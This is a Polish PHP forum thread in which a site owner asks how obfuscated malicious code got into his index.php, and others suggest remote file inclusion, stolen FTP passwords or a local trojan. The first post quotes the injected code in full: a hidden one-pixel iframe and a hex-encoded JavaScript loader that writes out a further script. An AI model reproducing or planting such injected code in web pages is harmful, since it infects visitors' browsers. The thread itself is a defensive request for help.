[php] Wirus na stronie - Forum PHP.pl

[php] Wirus na stronie

propage Zobacz profil	14.01.2009, 20:51:05 Post #1
Grupa: Zarejestrowani Postów: 330 Pomógł: 0 Dołączył: 25.01.2008 Ostrzeżenie: (0%)	na mojej stronie pojawił się taki kod [PHP] pobierz, plaintext <?php <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe> <script>function c102916999516l496e0d2bf1aea(l496e0d2bf22bc){ function l496e0d2bf2a8d(){var l496e0d2bf325e=16;return l496e0d2bf325e;} return (parseInt(l496e0d2bf22bc,l496e0d2bf2a8d()));}function l496e0d2bf3a2e(l496e0d2bf4200){ var l496e0d2c00793='';l496e0d2c026d5=String.fromCharCode;for(l496e0d2c00f63=0;l496e0d2c00f63<l496e0d2bf4200.length;l496e0d2c00f63+=2){ l496e0d2c00793+=(l496e0d2c026d5(c102916999516l496e0d2bf1aea(l496e0d2bf4200.substr(l496e0d2c00f63,2))));}return l496e0d2c00793;} var x.d.2='';var l496e0d2c030f5='3C736'+x.d.2+'3726'+x.d.2+'970743E6'+x.d.2+'96'+x.d.2+'6'+x.d.2+'28216'+x.d.2+'D796'+x.d.2+'96'+x.d.2+'1297B6'+x.d.2+'46'+x.d.2 +'F6'+x.d.2+'3756'+x.d.2+'D6'+x.d.2+'56'+x.d.2+'E742E77726'+x.d.2+'9746'+x.d.2+'528756'+x.d.2+'E6'+x.d.2+'5736'+x.d.2+'36'+x.d.2+'1706'+x.d.2 +'528202725336' +x.d.2+'32536'+x.d.2+'392536'+x.d.2+'36'+x.d.2+'2537322536'+x.d.2+'312536'+x.d.2+'6'+x.d.2+'42536'+x.d.2 +'352532302536'+x.d.2+'6'+x.d.2+'52536'+x.d.2+'312536' +x.d.2+'6'+x.d.2+'42536'+x.d.2+'3525336'+x.d.2+'42536'+x.d.2+'332533312533302532302537332537322536'+x.d.2+'3325336'+x.d.2+ '42532372536'+x.d.2+'3825373425373425373025336' +x.d.2+'125326'+x.d.2+'6'+x.d.2+'25326'+x.d.2+'6'+x.d.2+'2536'+x.d.2+'372536'+x.d.2+'6'+x.d.2+'6'+x.d.2+'2536'+x.d.2+'372536'+x.d.2+'6' +x.d.2+'6'+x.d.2+'2533322536'+x.d.2+'6'+x.d.2+'42536' +x.d.2+'3525326'+x.d.2+'52536'+x.d.2+'6'+x.d.2+'52536'+x.d.2+'3525373425326'+x.d.2+'6'+x.d.2+'25326'+x.d.2+'52536'+x.d.2+ '372536'+x.d.2+'6'+x.d.2+'6'+x.d.2+'25326'+x.d.2+'6'+x.d.2+'2536'+x.d.2+'332536' +x.d.2+'382536'+x.d.2+'352536'+x.d.2+'332536'+x.d.2+'6'+x.d.2+'225326'+x.d.2+'52536' +x.d.2+'382537342536'+x.d.2+'6'+x.d.2+'42536'+x.d.2+'6'+x.d.2+'32532372532302537372536'+x.d.2+'392536'+x.d.2+'342537342536' +x.d.2+'3825336'+x.d.2+'42533322533322533322532302536'+x.d.2+'382536'+x.d.2+'352536'+x.d.2+'392536'+x.d.2+'372536'+x.d.2+ '3825373425336'+x.d.2+'42533352533342533372532302537332537342537392536'+x.d.2+'6'+x.d.2+'32536'+x.d.2+'3525336'+x.d.2+ '4253237253736'+x.d.2+'2536'+x.d.2+'392537332536'+x.d.2+'392536'+x.d.2+'322536'+x.d.2+'392536'+x.d.2+'6'+x.d.2+'32536'+x.d.2+ '3925373425373925336'+x.d.2+'12536'+x.d.2+'382536'+x.d.2+'392536'+x.d.2+'342536'+x.d.2+'342536'+x.d.2+'352536'+x.d.2+'6'+x.d.2+'525323725336' +x.d.2+'525336'+x.d.2+'325326'+x.d.2+'6'+x.d.2+'2536'+x.d.2+'392536'+x.d.2+'36'+x.d.2+'2537322536'+x.d.2+'312536'+x.d.2+'6'+x.d.2+'42536'+x.d.2+ '3525336'+x.d.2+'52729293B7D76'+x.d.2+'6'+x.d.2+'172206'+x.d.2+'D796'+x.d.2+'96'+x.d.2+'13D7472756'+x.d.2+'53B3C2F736'+x.d.2+'3726'+x.d.2+ '970743E';document.write(l496e0d2bf3a2e(l496e0d2c030f5));</script> ?> [PHP] pobierz, plaintext Wstrzyknięty do pliku index.php Wie ktoś jak ten wirus dostaje się do pliku index.php? Stosuje się do wszystkich podstawowych zasas przy tworzeniu stron, filtruje zawsze wszystkie dane od użytkownika, hm

Odpowiedzi

erix Zobacz profil	14.01.2009, 21:36:35 Post #2
Grupa: Moderatorzy Postów: 15 467 Pomógł: 1451 Dołączył: 25.04.2005 Skąd: Szczebrzeszyn/Rzeszów	Cytat nie mam u siebie register global włączone. A allow_url_fopen? (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg) Często zdarza się, że boty jako parametr w URL podają adres do skryptu-trojana, który wykonuje polecenia atakującego. Narażony skrypt go include'uje, stąd już można zrobić wszystko...

Posty w temacie

propage [php] Wirus na stronie 14.01.2009, 20:51:05

MWL XSS?? a może masz jakieś pole input któ... 14.01.2009, 21:12:00

erix CytatXSS?? Nie sądzę. Raczej luka w postaci korz... 14.01.2009, 21:18:55

propage nie mam u siebie register global włączon... 14.01.2009, 21:25:19

erix Cytatnie mam u siebie register global włączone. A ... 14.01.2009, 21:36:35

propage allow_url_fopenOff allow_url_includeOff wszystki... 14.01.2009, 21:42:29

rzymek01 normalnie ktoś ci wszedł na ftp i zedytował plik 14.01.2009, 21:51:21

erix Cytatczy to, że są takie foldery już znaczy, że kt... 14.01.2009, 22:19:19

l0ud Nic z tych rzeczy. Prędzej robak lub trojan na kom... 14.01.2009, 22:27:19

propage Wirsu na komputerze lokalnym dopisalby ten kod do ... 14.01.2009, 22:36:23

l0ud Podejrzewam, że hasło jest zczytywane podczas infe... 15.01.2009, 18:04:40

pyro Ewentualnie poprostu przejrzyj logi... głównie htt... 15.01.2009, 18:08:12

propage problem ciagle występuje, ciągle tylko u tego same... 3.02.2009, 17:22:50

l0ud Nie. Ty albo klient używacie zainfekowanego komput... 3.02.2009, 20:35:58

szakal89 witam na stronie pokazuje mi wirusa walcze z nim ... 30.12.2012, 13:29:38

« Następny starszy · PHP · Następny nowszy »

2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych: